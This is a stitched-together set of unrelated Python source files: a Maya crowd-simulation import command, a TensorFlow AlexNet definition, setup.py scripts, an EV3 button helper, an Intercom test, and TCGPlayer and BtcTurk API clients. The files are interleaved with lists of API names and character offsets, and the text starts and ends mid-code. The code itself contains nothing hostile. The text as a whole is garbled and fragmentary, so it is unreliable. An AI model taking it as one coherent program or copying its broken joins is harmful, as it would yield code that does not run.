elif (str == "instance"):
options[kSkinTypeFlag] = MayaSkin.eSkinType.instance
else:
raise ns.py.Errors.BadArgumentError( 'Please choose either "smooth", "duplicate", or "instance" as the skinType' )
else:
options[kSkinTypeFlag] = MayaSkin.eSkinType.smooth
if argData.isFlagSet( kLoadSegmentsFlag ):
options[kLoadSegmentsFlag] = argData.flagArgumentBool( kLoadSegmentsFlag, 0 )
else:
options[kLoadSegmentsFlag] = False
if argData.isFlagSet( kLoadMaterialsFlag ):
options[kLoadMaterialsFlag] = argData.flagArgumentBool( kLoadMaterialsFlag, 0 )
else:
options[kLoadMaterialsFlag] = True
if argData.isFlagSet(kMaterialTypeFlag):
options[kMaterialTypeFlag] = argData.flagArgumentString(kMaterialTypeFlag, 0)
else:
options[kMaterialTypeFlag] = "blinn"
if argData.isFlagSet( kFrameStepFlag ):
options[kFrameStepFlag] = argData.flagArgumentInt( kFrameStepFlag, 0 )
else:
options[kFrameStepFlag] = 1
if argData.isFlagSet( kInstanceSegmentsFlag ):
options[kInstanceSegmentsFlag] = argData.flagArgumentBool( kInstanceSegmentsFlag, 0 )
else:
options[kInstanceSegmentsFlag] = True
if argData.isFlagSet( kSelectionFlag ):
selections =[]
num = argData.numberOfFlagUses( kSelectionFlag )
for i in range(num):
args = OpenMaya.MArgList()
argData.getFlagArgumentList( kSelectionFlag, i, args )
if args.length():
selections.append( args.asString(0) )
options[kSelectionFlag] = selections
else:
options[kSelectionFlag] = []
if argData.isFlagSet( kCacheGeometryFlag ):
options[kCacheGeometryFlag] = argData.flagArgumentBool( kCacheGeometryFlag, 0 )
else:
options[kCacheGeometryFlag] = False
if argData.isFlagSet( kDeleteSkeletonFlag ):
options[kDeleteSkeletonFlag] = argData.flagArgumentBool( kDeleteSkeletonFlag, 0 )
else:
options[kDeleteSkeletonFlag] = False
if argData.isFlagSet( kCacheDirFlag ):
options[kCacheDirFlag] = argData.flagArgumentString( kCacheDirFlag, 0 )
else:
options[kCacheDirFlag] = ""
if argData.isFlagSet( kRangeFlag ):
options[kRangeFlag] = argData.flagArgumentString( kRangeFlag, 0 )
else:
options[kRangeFlag] = ""
if argData.isFlagSet( kAnimTypeFlag ):
str = argData.flagArgumentString( kAnimTypeFlag, 0 )
if (str == "curves"):
options[kAnimTypeFlag] = MayaSimAgent.eAnimType.curves
elif (str == "loader"):
options[kAnimTypeFlag] = MayaSimAgent.eAnimType.loader
else:
raise ns.py.Errors.BadArgumentError( 'Please choose either "curves" or "loader" as the animType' )
else:
options[kAnimTypeFlag] = MayaSimAgent.eAnimType.curves
if ( options[kMaterialTypeFlag] != "blinn" and
options[kMaterialTypeFlag] != "lambert" ):
raise ns.py.Errors.BadArgumentError( 'Please choose either "blinn" or "lambert" as the materialType' )
if (options[kDeleteSkeletonFlag] and not options[kCacheGeometryFlag]):
raise ns.py.Errors.BadArgumentError( 'The skeleton can only be deleted when caching geometry' )
if ( options[kCacheGeometryFlag] and
MayaSkin.eSkinType.smooth != options[kSkinTypeFlag] ):
options[kCacheGeometryFlag] = False
options[kDeleteSkeletonFlag] = False
self.displayWarning( 'Skin type is "%s", geometry will not be cached. Please set skin type to "smooth" to use geometry caching.' % self._options[MsvOpt.kSkinType] )
return options
def doQuery( self, argData ):
if argData.isFlagSet( kSelectionFlag ):
if argData.isFlagSet( kMasFileFlag ):
masFile = argData.flagArgumentString( kMasFileFlag, 0 )
fileHandle = open(masFile, "r")
try:
mas = MasReader.read( fileHandle )
finally:
fileHandle.close()
self.setResult( mas.selectionGroup.selectionNames() )
else:
raise ns.py.Error.BadArgumentError( "When querying the -selection flag please use the -masFile to indicate which .mas file's selections to query." )
else:
raise ns.py.Error.BadArgumentError( 'Only the -selection flag is queryable.' )
def doIt(self,argList):
argData = OpenMaya.MArgDatabase( self.syntax(), argList )
if argData.isQuery():
self.doQuery( argData )
else:
options = self._parseArgs( argData )
undoQueue = mc.undoInfo( query=True, state=True )
try:
try:
mc.undoInfo( state=False )
scene = Scene.Scene()
scene.setMas(options[kMasFileFlag])
sim = Sim.Sim(scene,
options[kSimDirFlag],
options[kSimTypeFlag],
options[kCallsheetFlag],
options[kSelectionFlag],
options[kRangeFlag])
agentOptions = MayaAgent.Options()
agentOptions.loadGeometry = options[kLoadGeometryFlag]
agentOptions.loadPrimitives = options[kLoadSegmentsFlag]
agentOptions.loadMaterials = options[kLoadMaterialsFlag]
agentOptions.skinType = options[kSkinTypeFlag]
agentOptions.instancePrimitives = options[kInstanceSegmentsFlag]
agentOptions.materialType = options[kMaterialTypeFlag]
mayaSim = MayaSim.MayaSim()
mayaSim.build(sim,
options[kAnimTypeFlag],
options[kFrameStepFlag],
options[kCacheGeometryFlag],
options[kCacheDirFlag],
options[kDeleteSkeletonFlag],
agentOptions)
del mayaSim
del sim
del scene
gc.collect()
finally:
mc.undoInfo( state=undoQueue )
except ns.py.Errors.AbortError:
self.displayError("Import cancelled by user")
except:
raise
def creator():
return OpenMayaMPx.asMPxPtr( MsvSimImportCmd() )
def syntaxCreator():
syntax = OpenMaya.MSyntax()
syntax.addFlag( kSimDirFlag, kSimDirFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kSimTypeFlag, kSimTypeFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kMasFileFlag, kMasFileFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kCallsheetFlag, kCallsheetFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kLoadGeometryFlag, kLoadGeometryFlagLong, OpenMaya.MSyntax.kBoolean )
syntax.addFlag( kSkinTypeFlag, kSkinTypeFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kLoadSegmentsFlag, kLoadSegmentsFlagLong, OpenMaya.MSyntax.kBoolean )
syntax.addFlag( kLoadMaterialsFlag, kLoadMaterialsFlagLong, OpenMaya.MSyntax.kBoolean )
syntax.addFlag( kMaterialTypeFlag, kMaterialTypeFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kFrameStepFlag, kFrameStepFlagLong, OpenMaya.MSyntax.kLong )
syntax.addFlag( kInstanceSegmentsFlag, kInstanceSegmentsFlagLong, OpenMaya.MSyntax.kBoolean )
syntax.addFlag( kSelectionFlag, kSelectionFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kCacheGeometryFlag, kCacheGeometryFlagLong, OpenMaya.MSyntax.kBoolean )
syntax.addFlag( kDeleteSkeletonFlag, kDeleteSkeletonFlagLong, OpenMaya.MSyntax.kBoolean )
syntax.addFlag( kCacheDirFlag, kCacheDirFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kRangeFlag, kRangeFlagLong, OpenMaya.MSyntax.kString )
syntax.addFlag( kAnimTypeFlag, kAnimTypeFlagLong, OpenMaya.MSyntax.kString )
syntax.makeFlagMultiUse( kSelectionFlag )
syntax.makeFlagQueryWithFullArgs( kMasFileFlag, False )
syntax.enableQuery( True )
return syntax
| [
"ns.bridge.data.Scene.Scene",
"maya.OpenMaya.MSyntax",
"ns.bridge.io.MasReader.read",
"maya.cmds.undoInfo",
"maya.OpenMayaMPx.MPxCommand.__init__",
"maya.OpenMaya.MArgList",
"ns.maya.msv.MayaAgent.Options",
"ns.maya.msv.MayaSim.MayaSim",
"ns.bridge.data.Sim.Sim",
"gc.collect"
] | [((9528, 9546), 'maya.OpenMaya.MSyntax', 'OpenMaya.MSyntax', ([], {}), '()\n', (9544, 9546), True, 'import maya.OpenMaya as OpenMaya\n'), ((2676, 2713), 'maya.OpenMayaMPx.MPxCommand.__init__', 'OpenMayaMPx.MPxCommand.__init__', (['self'], {}), '(self)\n', (2707, 2713), True, 'import maya.OpenMayaMPx as OpenMayaMPx\n'), ((8161, 8196), 'maya.cmds.undoInfo', 'mc.undoInfo', ([], {'query': '(True)', 'state': '(True)'}), '(query=True, state=True)\n', (8172, 8196), True, 'import maya.cmds as mc\n'), ((5250, 5269), 'maya.OpenMaya.MArgList', 'OpenMaya.MArgList', ([], {}), '()\n', (5267, 5269), True, 'import maya.OpenMaya as OpenMaya\n'), ((7579, 7605), 'ns.bridge.io.MasReader.read', 'MasReader.read', (['fileHandle'], {}), '(fileHandle)\n', (7593, 7605), True, 'import ns.bridge.io.MasReader as MasReader\n'), ((8223, 8247), 'maya.cmds.undoInfo', 'mc.undoInfo', ([], {'state': '(False)'}), '(state=False)\n', (8234, 8247), True, 'import maya.cmds as mc\n'), ((8269, 8282), 'ns.bridge.data.Scene.Scene', 'Scene.Scene', ([], {}), '()\n', (8280, 8282), True, 'import ns.bridge.data.Scene as Scene\n'), ((8341, 8476), 'ns.bridge.data.Sim.Sim', 'Sim.Sim', (['scene', 'options[kSimDirFlag]', 'options[kSimTypeFlag]', 'options[kCallsheetFlag]', 'options[kSelectionFlag]', 'options[kRangeFlag]'], {}), '(scene, options[kSimDirFlag], options[kSimTypeFlag], options[\n kCallsheetFlag], options[kSelectionFlag], options[kRangeFlag])\n', (8348, 8476), True, 'import ns.bridge.data.Sim as Sim\n'), ((8547, 8566), 'ns.maya.msv.MayaAgent.Options', 'MayaAgent.Options', ([], {}), '()\n', (8564, 8566), True, 'import ns.maya.msv.MayaAgent as MayaAgent\n'), ((8955, 8972), 'ns.maya.msv.MayaSim.MayaSim', 'MayaSim.MayaSim', ([], {}), '()\n', (8970, 8972), True, 'import ns.maya.msv.MayaSim as MayaSim\n'), ((9259, 9271), 'gc.collect', 'gc.collect', ([], {}), '()\n', (9269, 9271), False, 'import gc\n'), ((9290, 9318), 'maya.cmds.undoInfo', 'mc.undoInfo', ([], {'state': 'undoQueue'}), '(state=undoQueue)\n', (9301, 9318), True, 'import maya.cmds as mc\n')] |
import tensorflow as tf
def maxPoolLayer(x, ksize, stride, padding='VALID', name=None):
return tf.nn.max_pool(x,
ksize=[1, ksize, ksize, 1],
strides=[1, stride, stride, 1],
padding=padding,
name=name)
def LRN(x, R=2, alpha=2e-5, beta=0.75, bias=1.0, name=None):
return tf.nn.local_response_normalization(x,
depth_radius=R,
alpha=alpha,
beta=beta,
bias=bias,
name=name)
def fcLayer(x, outputD, name, std_init=0.005, bias_init=0.0, reluFlag=True):
inputD = int(x.get_shape()[-1])
with tf.variable_scope(name, reuse=tf.AUTO_REUSE) as scope:
w = tf.get_variable("w",
shape=[inputD, outputD],
dtype="float",
initializer=tf.random_normal_initializer(
stddev=std_init),
regularizer=tf.contrib.layers.l2_regularizer(5e-4))
b = tf.get_variable("b",
[outputD],
dtype="float",
initializer=tf.constant_initializer(bias_init))
out = tf.nn.xw_plus_b(x, w, b, name=scope.name)
if reluFlag:
return tf.nn.relu(out)
else:
return out
def convLayer(x, ksize, stride, feature, padding='SAME', bias_init=0.0, groups=1, name=None):
channel = int(x.get_shape()[-1])
def conv(a, b): return tf.nn.conv2d(a,
b,
strides=[1, stride, stride, 1],
padding=padding)
with tf.variable_scope(name) as scope:
w = tf.get_variable("w",
shape=[ksize, ksize, channel / groups, feature],
initializer=tf.random_normal_initializer(
stddev=0.01),
regularizer=tf.contrib.layers.l2_regularizer(5e-4))
b = tf.get_variable("b",
shape=[feature],
initializer=tf.constant_initializer(bias_init))
xNew = tf.split(value=x, num_or_size_splits=groups, axis=3)
wNew = tf.split(value=w, num_or_size_splits=groups, axis=3)
featureMap = [conv(t1, t2) for t1, t2 in zip(xNew, wNew)]
mergeFeatureMap = tf.concat(values=featureMap, axis=3)
out = tf.nn.bias_add(mergeFeatureMap, b)
return tf.nn.relu(out, name=scope.name)
def alexnet(input, is_training, root_conv_stride=4):
end_points = {}
with tf.variable_scope('alexnet', reuse=tf.AUTO_REUSE):
conv1 = convLayer(input, 11, root_conv_stride,
96, "VALID", name="conv1")
end_points['conv1'] = conv1
pool1 = maxPoolLayer(conv1, 3, 2, name="pool1")
lrn1 = LRN(pool1, name="lrn1")
conv2 = convLayer(lrn1, 5, 1, 256, groups=2,
bias_init=1.0, name="conv2")
end_points['conv2'] = conv2
pool2 = maxPoolLayer(conv2, 3, 2, name="pool2")
lrn2 = LRN(pool2, name="lrn2")
conv3 = convLayer(lrn2, 3, 1, 384, name="conv3")
end_points['conv3'] = conv3
conv4 = convLayer(conv3, 3, 1, 384, groups=2,
bias_init=1.0, name="conv4")
end_points['conv4'] = conv4
conv5 = convLayer(conv4, 3, 1, 256, groups=2,
bias_init=1.0, name="conv5")
end_points['conv5'] = conv5
conv5 = tf.pad(conv5, paddings=[[0, 0], [1, 0], [1, 0], [0, 0]])
pool5 = maxPoolLayer(conv5, 3, 2, name="pool5")
#fc1 = fcLayer(tf.layers.flatten(pool5), 1024, name="fc6")
fc1 = convLayer(pool5, 3, 1, 1024, "VALID", bias_init=1.0, name="fc6")
end_points['fc6'] = fc1
return fc1, end_points
| [
"tensorflow.nn.local_response_normalization",
"tensorflow.nn.conv2d",
"tensorflow.nn.max_pool",
"tensorflow.variable_scope",
"tensorflow.nn.relu",
"tensorflow.pad",
"tensorflow.contrib.layers.l2_regularizer",
"tensorflow.split",
"tensorflow.nn.xw_plus_b",
"tensorflow.random_normal_initializer",
... | [((101, 211), 'tensorflow.nn.max_pool', 'tf.nn.max_pool', (['x'], {'ksize': '[1, ksize, ksize, 1]', 'strides': '[1, stride, stride, 1]', 'padding': 'padding', 'name': 'name'}), '(x, ksize=[1, ksize, ksize, 1], strides=[1, stride, stride, 1\n ], padding=padding, name=name)\n', (115, 211), True, 'import tensorflow as tf\n'), ((385, 489), 'tensorflow.nn.local_response_normalization', 'tf.nn.local_response_normalization', (['x'], {'depth_radius': 'R', 'alpha': 'alpha', 'beta': 'beta', 'bias': 'bias', 'name': 'name'}), '(x, depth_radius=R, alpha=alpha, beta=\n beta, bias=bias, name=name)\n', (419, 489), True, 'import tensorflow as tf\n'), ((839, 883), 'tensorflow.variable_scope', 'tf.variable_scope', (['name'], {'reuse': 'tf.AUTO_REUSE'}), '(name, reuse=tf.AUTO_REUSE)\n', (856, 883), True, 'import tensorflow as tf\n'), ((1428, 1469), 'tensorflow.nn.xw_plus_b', 'tf.nn.xw_plus_b', (['x', 'w', 'b'], {'name': 'scope.name'}), '(x, w, b, name=scope.name)\n', (1443, 1469), True, 'import tensorflow as tf\n'), ((1725, 1792), 'tensorflow.nn.conv2d', 'tf.nn.conv2d', (['a', 'b'], {'strides': '[1, stride, stride, 1]', 'padding': 'padding'}), '(a, b, strides=[1, stride, stride, 1], padding=padding)\n', (1737, 1792), True, 'import tensorflow as tf\n'), ((1923, 1946), 'tensorflow.variable_scope', 'tf.variable_scope', (['name'], {}), '(name)\n', (1940, 1946), True, 'import tensorflow as tf\n'), ((2433, 2485), 'tensorflow.split', 'tf.split', ([], {'value': 'x', 'num_or_size_splits': 'groups', 'axis': '(3)'}), '(value=x, num_or_size_splits=groups, axis=3)\n', (2441, 2485), True, 'import tensorflow as tf\n'), ((2501, 2553), 'tensorflow.split', 'tf.split', ([], {'value': 'w', 'num_or_size_splits': 'groups', 'axis': '(3)'}), '(value=w, num_or_size_splits=groups, axis=3)\n', (2509, 2553), True, 'import tensorflow as tf\n'), ((2647, 2683), 'tensorflow.concat', 'tf.concat', ([], {'values': 'featureMap', 'axis': '(3)'}), '(values=featureMap, axis=3)\n', (2656, 2683), True, 'import tensorflow as tf\n'), ((2699, 2733), 'tensorflow.nn.bias_add', 'tf.nn.bias_add', (['mergeFeatureMap', 'b'], {}), '(mergeFeatureMap, b)\n', (2713, 2733), True, 'import tensorflow as tf\n'), ((2749, 2781), 'tensorflow.nn.relu', 'tf.nn.relu', (['out'], {'name': 'scope.name'}), '(out, name=scope.name)\n', (2759, 2781), True, 'import tensorflow as tf\n'), ((2867, 2916), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""alexnet"""'], {'reuse': 'tf.AUTO_REUSE'}), "('alexnet', reuse=tf.AUTO_REUSE)\n", (2884, 2916), True, 'import tensorflow as tf\n'), ((3802, 3858), 'tensorflow.pad', 'tf.pad', (['conv5'], {'paddings': '[[0, 0], [1, 0], [1, 0], [0, 0]]'}), '(conv5, paddings=[[0, 0], [1, 0], [1, 0], [0, 0]])\n', (3808, 3858), True, 'import tensorflow as tf\n'), ((1511, 1526), 'tensorflow.nn.relu', 'tf.nn.relu', (['out'], {}), '(out)\n', (1521, 1526), True, 'import tensorflow as tf\n'), ((1063, 1108), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': 'std_init'}), '(stddev=std_init)\n', (1091, 1108), True, 'import tensorflow as tf\n'), ((1183, 1223), 'tensorflow.contrib.layers.l2_regularizer', 'tf.contrib.layers.l2_regularizer', (['(0.0005)'], {}), '(0.0005)\n', (1215, 1223), True, 'import tensorflow as tf\n'), ((1378, 1412), 'tensorflow.constant_initializer', 'tf.constant_initializer', (['bias_init'], {}), '(bias_init)\n', (1401, 1412), True, 'import tensorflow as tf\n'), ((2107, 2148), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': '(0.01)'}), '(stddev=0.01)\n', (2135, 2148), True, 'import tensorflow as tf\n'), ((2223, 2263), 'tensorflow.contrib.layers.l2_regularizer', 'tf.contrib.layers.l2_regularizer', (['(0.0005)'], {}), '(0.0005)\n', (2255, 2263), True, 'import tensorflow as tf\n'), ((2381, 2415), 'tensorflow.constant_initializer', 'tf.constant_initializer', (['bias_init'], {}), '(bias_init)\n', (2404, 2415), True, 'import tensorflow as tf\n')] |
from setuptools import setup, find_packages
setup(name='Multilevel MDA-Lite Paris Traceroute',
version='0.1',
description='Costless version of MDA + Router level view of traceroute',
url='https://gitlab.planet-lab.eu/',
author='<NAME>,',
author_email='<EMAIL>',
license='MIT',
packages=find_packages(),
install_requires=[
'scapy', 'netifaces'
],
zip_safe=False) | [
"setuptools.find_packages"
] | [((329, 344), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (342, 344), False, 'from setuptools import setup, find_packages\n')] |
#!/usr/bin/env pybricks-micropython
# ↑ Interpretador do python definido para o EV3
# Importações dos módulos utilizados
# Módulo principal do brick importado da biblioteca principal
from pybricks import ev3brick as brick
# Módulo dos botões do brick
from pybricks.parameters import Button
# Módulo de esperar, dentro das ferramentas
from pybricks.tools import wait
# Importa a nossa outra função criada no outro programa
from Botoes_1 import pressionado
'''
Ao executar o programa anterior, você perceberá que ao pressionar o botão
muitas linhas foram registradas no console, e isso acontece por conta da
taxa de atualização do programa.
Quando você aperta o botão uma vez, ele percebe isso e escreve no console,
mas não espera você soltar, e é isso que vamos explorar nesse programa
'''
# Criar uma função que verifica se um botão não está pressionado
def solto(botao):
# Se o botão escolhido não estiver dentro da lista de botões pressionados
if botao not in brick.buttons():
# Retorna verdadeiro
return True
# Senão
else:
# Retorna falso
return False
# Criar uma função que espera o botão ser pressionado e depois solto
def esperar_pressionado_solto(botao):
# Enquanto o botão não for pressionado
while not pressionado(botao):
# Faz uma pausa de 10 ms
wait(10)
# Após pressionado, enquanto não for solto
while not solto(botao):
# Faz uma pausa de 10 ms
wait(10)
# Ou seja, verifica de 10 em 10 ms nossas condições
# Vamos testar!
def main():
print('Inicio do teste... Pressione e solte o botão!')
esperar_pressionado_solto(Button.UP)
print('Botão pressionado e solto!')
# Se o programa está executando como principal
if __name__ == '__main__':
# Executa nossa função de teste
main()
# Fonte:
# https://pybricks.github.io/ev3-micropython/hubs.html#pybricks.hubs.EV3Brick.buttons.pressed
| [
"Botoes_1.pressionado",
"pybricks.ev3brick.buttons",
"pybricks.tools.wait"
] | [((976, 991), 'pybricks.ev3brick.buttons', 'brick.buttons', ([], {}), '()\n', (989, 991), True, 'from pybricks import ev3brick as brick\n'), ((1275, 1293), 'Botoes_1.pressionado', 'pressionado', (['botao'], {}), '(botao)\n', (1286, 1293), False, 'from Botoes_1 import pressionado\n'), ((1336, 1344), 'pybricks.tools.wait', 'wait', (['(10)'], {}), '(10)\n', (1340, 1344), False, 'from pybricks.tools import wait\n'), ((1462, 1470), 'pybricks.tools.wait', 'wait', (['(10)'], {}), '(10)\n', (1466, 1470), False, 'from pybricks.tools import wait\n')] |
# -*- coding: utf-8 -*-
import os
import unittest
from intercom.client import Client
intercom = Client(
os.environ.get('INTERCOM_PERSONAL_ACCESS_TOKEN'))
class SegmentTest(unittest.TestCase):
@classmethod
def setup_class(cls):
cls.segment = intercom.segments.all()[0]
def test_find_segment(self):
# Find a segment
segment = intercom.segments.find(id=self.segment.id)
self.assertEqual(segment.id, self.segment.id)
def test_iterate(self):
# Iterate over all segments
for segment in intercom.segments.all():
self.assertTrue(segment.id is not None)
| [
"os.environ.get"
] | [((110, 158), 'os.environ.get', 'os.environ.get', (['"""INTERCOM_PERSONAL_ACCESS_TOKEN"""'], {}), "('INTERCOM_PERSONAL_ACCESS_TOKEN')\n", (124, 158), False, 'import os\n')] |
import os
import json
import logging
from functools import partial
from json import JSONDecodeError
from typing import Any, Dict, List, NamedTuple, Union
import requests
from tcgplayer_api.auth import BearerAuth
from tcgplayer_api.utils import words_to_snake_case
logger = logging.getLogger(__name__)
# TODO: Consider using werkzeug exceptions
class UnexpectedStatusCode(Exception):
pass
class HttpMethodError(Exception):
pass
class Response(NamedTuple):
status_code: int
headers: Dict[str, str]
json: Union[List[Dict[str, Any]], Dict[str, Any]] = None
class RequestsClient:
"""Wrapper around requests to simplify interaction with JSON REST APIs"""
DEFAULT_HEADERS = {
"Accept": "application/json",
"Content-Type": "application/json",
}
def __init__(self, auth: BearerAuth, headers: dict = None):
_headers = dict(self.DEFAULT_HEADERS)
if headers is not None:
_headers.update(headers)
s = requests.Session()
s.auth = auth
self.headers = _headers
self.session = s
def __repr__(self):
return "RequestsClient"
def request(self, method: str, url: str, **kwargs) -> Response:
req_headers = dict(self.headers)
if "headers" in kwargs:
headers_to_add = kwargs.pop("headers")
req_headers.update(headers_to_add)
r = self.session.request(method, url, headers=req_headers, **kwargs)
r.raise_for_status()
try:
resp = Response(status_code=r.status_code, headers=r.headers, json=r.json())
except JSONDecodeError:
resp = Response(status_code=r.status_code, headers=r.headers)
return resp
class TCGPlayerClient:
API_SPEC_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), "api_specs"))
def __init__(self, auth: BearerAuth, headers: dict = None,
api_version: str = None, ):
headers = headers or {}
self.client = RequestsClient(auth=auth, headers=headers)
self.version = api_version or self._get_latest_api_version()
self.base_url = f"http://api.tcgplayer.com/{self.version}"
self.services = {}
api_file = f"{self.API_SPEC_PATH}/{self.version}.json"
with open(api_file, "r") as f:
api_data = json.load(f)
# Add each API object as a class instance method
for service in api_data:
func_name = words_to_snake_case(service["name"])
method = self._method_factory(func_name, service["uri"], service["http_method"])
method.__name__ = method.__qualname__ = func_name
method.__doc__ = service.get("description")
self.__dict__[func_name] = method
def _get_latest_api_version(self):
return max(os.listdir(self.API_SPEC_PATH))[:-5] # strip ending ".json"
def _method_factory(self, service_name: str, uri: str, http_method: str):
"""Factory function to create class instance methods from api_specs."""
def service_name(**parameters):
# Note that parameters combined path parameters and query parameters
# this is for convenience,
# but assumes that path params and query params can't collide.
request_uri = uri.format(**parameters)
request_url = f"{self.base_url}{request_uri}"
# Execute API Call
# Will raise HTTPError: "405 Client Error: Method Not Allowed for url"
# if a bad http_method is given
# TODO: See why posts aren't working ATM; "params" might need to be "data"
# See: https://requests.readthedocs.io/en/master/api/?highlight=.request#requests.Session.request
response = self.client.request(http_method, request_url, params=parameters)
if response.status_code != 200:
raise UnexpectedStatusCode
resp_json = response.json
if not resp_json:
raise ValueError("No data returned.")
# TODO, loop through pages and collect results
# TODO create a class for the response
return resp_json
return service_name
| [
"logging.getLogger",
"os.listdir",
"requests.Session",
"os.path.dirname",
"tcgplayer_api.utils.words_to_snake_case",
"json.load"
] | [((277, 304), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (294, 304), False, 'import logging\n'), ((991, 1009), 'requests.Session', 'requests.Session', ([], {}), '()\n', (1007, 1009), False, 'import requests\n'), ((1796, 1821), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1811, 1821), False, 'import os\n'), ((2332, 2344), 'json.load', 'json.load', (['f'], {}), '(f)\n', (2341, 2344), False, 'import json\n'), ((2460, 2496), 'tcgplayer_api.utils.words_to_snake_case', 'words_to_snake_case', (["service['name']"], {}), "(service['name'])\n", (2479, 2496), False, 'from tcgplayer_api.utils import words_to_snake_case\n'), ((2813, 2843), 'os.listdir', 'os.listdir', (['self.API_SPEC_PATH'], {}), '(self.API_SPEC_PATH)\n', (2823, 2843), False, 'import os\n')] |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='xacro4sdf',
version='2.1.0',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/gezp/xacro4sdf',
description='a simple XML macro script for sdf, like ros/xacro which is desiged for urdf.',
long_description=long_description,
long_description_content_type='text/markdown',
license='MIT',
keywords=['sdf','sdformat','xacro', 'gazebo', 'ignition'],
include_package_data=True,
packages=find_packages(),
entry_points={
'console_scripts': [
'xacro4sdf=xacro4sdf:xacro4sdf_main',
]
}
)
| [
"os.path.dirname",
"setuptools.find_packages",
"os.path.join"
] | [((138, 160), 'os.path.dirname', 'path.dirname', (['__file__'], {}), '(__file__)\n', (150, 160), False, 'from os import path\n'), ((172, 210), 'os.path.join', 'path.join', (['this_directory', '"""README.md"""'], {}), "(this_directory, 'README.md')\n", (181, 210), False, 'from os import path\n'), ((735, 750), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (748, 750), False, 'from setuptools import setup, find_packages\n')] |
import time, base64, hmac, hashlib, json, requests
class BtcTurk():
BASE_URL = "https://api.btcturk.com"
GRAPH_BASE_URL = "https://graph-api.btcturk.com"
def __init__(self, api_key=None, api_Secret=None):
self.api_key = api_key
self.api_Secret = api_Secret
def _headers(self,protection):
if protection:
if self.api_key and self.api_Secret:
apiSecret = base64.b64decode(self.api_Secret)
stamp = str(int(time.time())*1000)
data = "{}{}".format(self.api_key, stamp).encode("utf-8")
signature = hmac.new(apiSecret, data, hashlib.sha256).digest()
signature = base64.b64encode(signature)
return {"X-PCK": self.api_key, "X-Stamp": stamp, "X-Signature": signature, "Content-Type" : "application/json"}
else:
return "You must set your public and private key for this method."
return {}
def ticker(self,pair_symbol = None):
if pair_symbol:
method = "/api/v2/ticker?pairSymbol=" + pair_symbol
uri = self.BASE_URL + method
result = requests.get(url=uri)
result = result.json()
return json.dumps(result, indent=2)
else:
method = "/api/v2/ticker"
uri = self.BASE_URL + method
result = requests.get(url=uri)
result = result.json()
return json.dumps(result, indent=2)
def ticker_currency(self,symbol = None):
if symbol:
method = "/api/v2/ticker/currency?symbol=" + symbol
uri = self.BASE_URL + method
result = requests.get(url=uri)
result = result.json()
return json.dumps(result, indent=2)
def get_order_book(self,pair_symbol = None):
if pair_symbol:
method = "/api/v2/orderbook?pairSymbol=" + pair_symbol
uri = self.BASE_URL + method
result = requests.get(url=uri)
result = result.json()
return json.dumps(result, indent=2)
else:
return "Choose a pair Symbol for this method."
def get_all_trades(self,pair_symbol = None,last = None):
if pair_symbol:
method = "/api/v2/trades?pairSymbol=" + pair_symbol
uri = self.BASE_URL + method
uri = self.BASE_URL + method
result = requests.get(url=uri)
result = result.json()
return json.dumps(result, indent=2)
else:
return "Choose a pair Symbol for this method."
def get_last_trades(self,pair_symbol = None,last = None):
if pair_symbol:
method = "/api/v2/trades?pairSymbol=" + pair_symbol
uri = self.BASE_URL + method
if last:
uri = self.BASE_URL + method
result = requests.get(url=uri +"&"+ last)
result = result.json()
return json.dumps(result, indent=2)
else:
return "Choose a pair Symbol for this method."
else:
return "Choose a pair Symbol for this method."
def get_all_ohcl(self,pair_symbol):
if pair_symbol:
method = "/v1/ohlcs?pair=" + pair_symbol
uri = self.GRAPH_BASE_URL + method
result = requests.get(url=uri)
result = result.json()
return json.dumps(result, indent=2)
else:
return "Choose a pair Symbol for this method."
def get_balances(self):
method = "/api/v1/users/balances"
uri = self.BASE_URL + method
result = requests.get(url=uri, headers=self._headers(True))
result = result.json()
return json.dumps(result, indent=2)
def get_transactions(self):
method = "/api/v1/users/transactions/trade"
uri = self.BASE_URL + method
result = requests.get(url=uri, headers=self._headers(True))
result = result.json()
return json.dumps(result, indent=2)
def get_open_order(self,pair_symbol):
if pair_symbol:
method = "/api/v1/openOrders?pairSymbol=" + pair_symbol
uri = self.BASE_URL + method
result = requests.get(url=uri, headers=self._headers(True))
result = result.json()
return json.dumps(result, indent=2)
else:
return "Choose a pair Symbol for this method."
def cancel_order(self,order_id):
if order_id:
method = "/api/v1/order?id=" + order_id
uri = self.BASE_URL + method
result = requests.get(url=uri, headers=self._headers(True))
result = result.json()
return json.dumps(result, indent=2)
else:
return "Choose a pair Symbol for this method."
def market_sell(self, pair_symbol, quantity):
method = "/api/v1/order"
uri = self.BASE_URL + method
params={"quantity": quantity ,"price": "0","stopPrice": 0, "newOrderClientId":"BtcTurk API", "orderMethod":"market", "orderType":"sell", "pairSymbol":pair_symbol}
result = requests.post(url=uri, headers=self._headers(True), json=params)
result = result.json()
return json.dumps(result, indent=2)
def market_buy(self, pair_symbol, quantity):
method = "/api/v1/order"
uri = self.BASE_URL + method
params={"quantity": quantity ,"price": "0","stopPrice": 0, "newOrderClientId":"BtcTurk API", "orderMethod":"market", "orderType":"buy", "pairSymbol":pair_symbol}
result = requests.post(url=uri, headers=self._headers(True), json=params)
result = result.json()
return json.dumps(result, indent=2)
def limit_sell(self, pair_symbol, quantity, price):
method = "/api/v1/order"
uri = self.BASE_URL + method
